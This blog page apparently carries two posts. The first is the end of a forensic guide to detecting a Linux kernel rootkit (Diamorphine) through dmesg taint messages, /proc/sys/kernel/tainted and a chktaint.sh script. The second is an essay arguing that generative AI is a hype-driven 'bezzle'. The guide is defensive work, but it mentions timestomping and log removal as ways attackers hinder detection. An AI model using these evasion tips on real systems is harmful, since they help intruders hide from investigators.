/usr/lib/modules/.../modules.devname
/usr/lib/modules/.../modules.softdep
/usr/lib/modules/.../modules.symbols
/usr/lib/modules/.../modules.symbols.bin

Timestomping these files and directories could make things more difficult for hunters.

But loading the rootkit is also likely to “taint” the kernel. You can try looking at the dmesg output for taint warnings:

# dmesg | grep taint
[ 8.390098] diamorphine: loading out-of-tree module taints kernel.
[ 8.390112] diamorphine: module verification failed: signature and/or required key missing - tainting kernel

However, these log messages can be removed by the attacker or simply disappear due to the system’s normal log rotation (if the machine has been running long enough). So you should also look at /proc/sys/kernel/tainted:

# cat /proc/sys/kernel/tainted
12288

Any non-zero value means that the kernel is tainted. To interpret the value, here is a trick based on an idea in the kernel.org document I referenced above:

# taintval=$(cat /proc/sys/kernel/tainted)
# for i in {0..18}; do [[ $(($taintval>>$i & 1)) -eq 1 ]] && echo $i; done
12
13

Referring to the kernel.org document, bit 12 being set means an “out of tree” (externally built) module was loaded. Bit 13 means the module was unsigned. Notice that these flags correspond to the log messages found in the dmesg output above.

While this is a useful bit of command-line kung fu, I thought it might be useful to have in a more portable format and with more verbose output. So I present to you chktaint.sh:

$ chktaint.sh
externally-built (“out-of-tree”) module was loaded
unsigned module was loaded

By default chktaint.sh reads the value from /proc/sys/kernel/tainted on the live system. But in many cases you may be looking at captured evidence offline. So chktaint.sh also allows you to specify an alternate file path (“chktaint.sh /path/to/evidence/file“) or simply a raw numeric value from /proc/sys/kernel/tainted (“chktaint.sh 12288“).

The persistence mechanism(s) deployed by the attacker are often the best way to detect whether or not a system is compromised. If the attacker is using an LKM rootkit, checking /proc/sys/kernel/tainted is often a good first step in determining if you have a problem. This can be combined with tools like chkproc (find hidden processes) and chkdirs (find hidden directories) from the chkrootkit project.

The Emperor’s New Clothes

My good friend Matt and I graduated college the same year. I went off into the work world and he headed for a graduate degree program in nuclear engineering. Much of the research effort in nuclear engineering is centered around developing sustainable fusion technology. Matt quickly realized that something was off.

So he went to his faculty adviser, who had been pursuing fusion research for several decades, and asked him, “I’m in my early 20’s, do you think that we will achieve viable fusion technology in my lifetime?”

The advisor’s answer was an involved discussion of “No.” Sustainable fusion technology involves an entire collection of problems that we are not close to solving. The materials science alone required to construct a vessel to hold the fusion reaction and extract power from it safely is well beyond our current capabilities even decades after my friend had the conversation with his advisor.

Happily for my friend, he had this conversation before he had sunk too much time into his research. Matt bailed out of nuclear engineering, changed his research focus, and has had a highly successful career in engineering education.

Meanwhile, I had been lucky enough to land a job doing Unix support at AT&T Bell Labs. One of the projects we supported was a research group that was working to develop a bespoke system that implemented Karmarkar’s algorithm for linear programming. This was an enormous project that employed hundreds of developers and consumed huge amounts of resources. The customers were the major airlines– scheduling aircraft and the flight crews that staff them is a classic problem in linear programming that directly impacts the bottom line of these companies.

You likely have never heard of Karmarkar’s algorithm, except perhaps for the controversy around it. Initially hailed as a major step forward that would revolutionize linear programming, its detractors claimed that, upon closer scrutiny, this so-called “revolutionary” algorithm was just a combination of known heuristics and speedups. It was not a substantial improvement over existing algorithms of the time.

I never studied the algorithm enough to determine which side’s claims were correct. What I do know is that the airlines pulled their funding and AT&T’s project was scuttled. The IT support team came in on Monday and everybody who was working on that project was literally gone. We moved through their empty office space for the next week collecting computer equipment to be repurposed for other projects. Some of the developers got shifted to other projects as well, but I imagine many people suddenly found themselves looking for work.

The airlines poured millions of dollars into a project that produced exactly nothing of value. Governments around the world continue to pour billions into fusion research with little to show for it and very little hope of fusion power in our lifetimes. Why is so much time, effort, and money being wasted?

These projects have several factors in common. Their goal is highly desirable: a “revolution” that would reshape the world as we know it, or at least an entire industry. The path involves highly complex technology that is impenetrable to a non-specialist: a complex algorithm or deep scientific research necessary to invent things that have never been done before. And they require massive amounts of funding.

This is a perfect recipe for bad decision making or outright fraud. People will sacrifice a great deal to achieve a significant goal. Because the path to that goal is difficult to comprehend, people will fool themselves into thinking the solution is “just around the corner”. Critical thinking skills fly out the window as people focus on the goal and can’t or won’t focus on the process to get there.

And when the project attracts unscrupulous operators who realize that there is money to be made in prolonging the effort, you have the makings of a bezzle. The unscrupulous promise a wonderful new world but use any excuse to keep extracting money from the situation. When challenged about their lack of results they just say, “Technology is complex and unpredictable, but I swear we are almost there!” Technology is a perfect breeding ground for bezzles because we have socialized the idea that computers and technology are inscrutable to mere mortals who must defer to a high priesthood to interpret the signs and omens.

“Generative AI” and “large language models” are the latest techno bezzle. But “AI” is a constant and recurring bezzle that I have seen numerous times in my decades in technology. Remember “machine learning”? Remember “neural networks”? I have lived through too many of these hype cycles and seen too many people lose their jobs and/or retirement funds due to companies that bet the farm on the latest bezzle.

The AI hype is too strong right now for me to convince people caught up in it that they are being conned. But for the rest of you I want you to recognize the patterns at play here and apply your critical thinking skills to any new “revolutionary” technologies that follow a similar path. And try to educate others so that we don’t as a society keep making the same sorts of mistakes over and over again. The resources we are wasting on the current AI hype cycle are killing the planet and could be put to so much better use.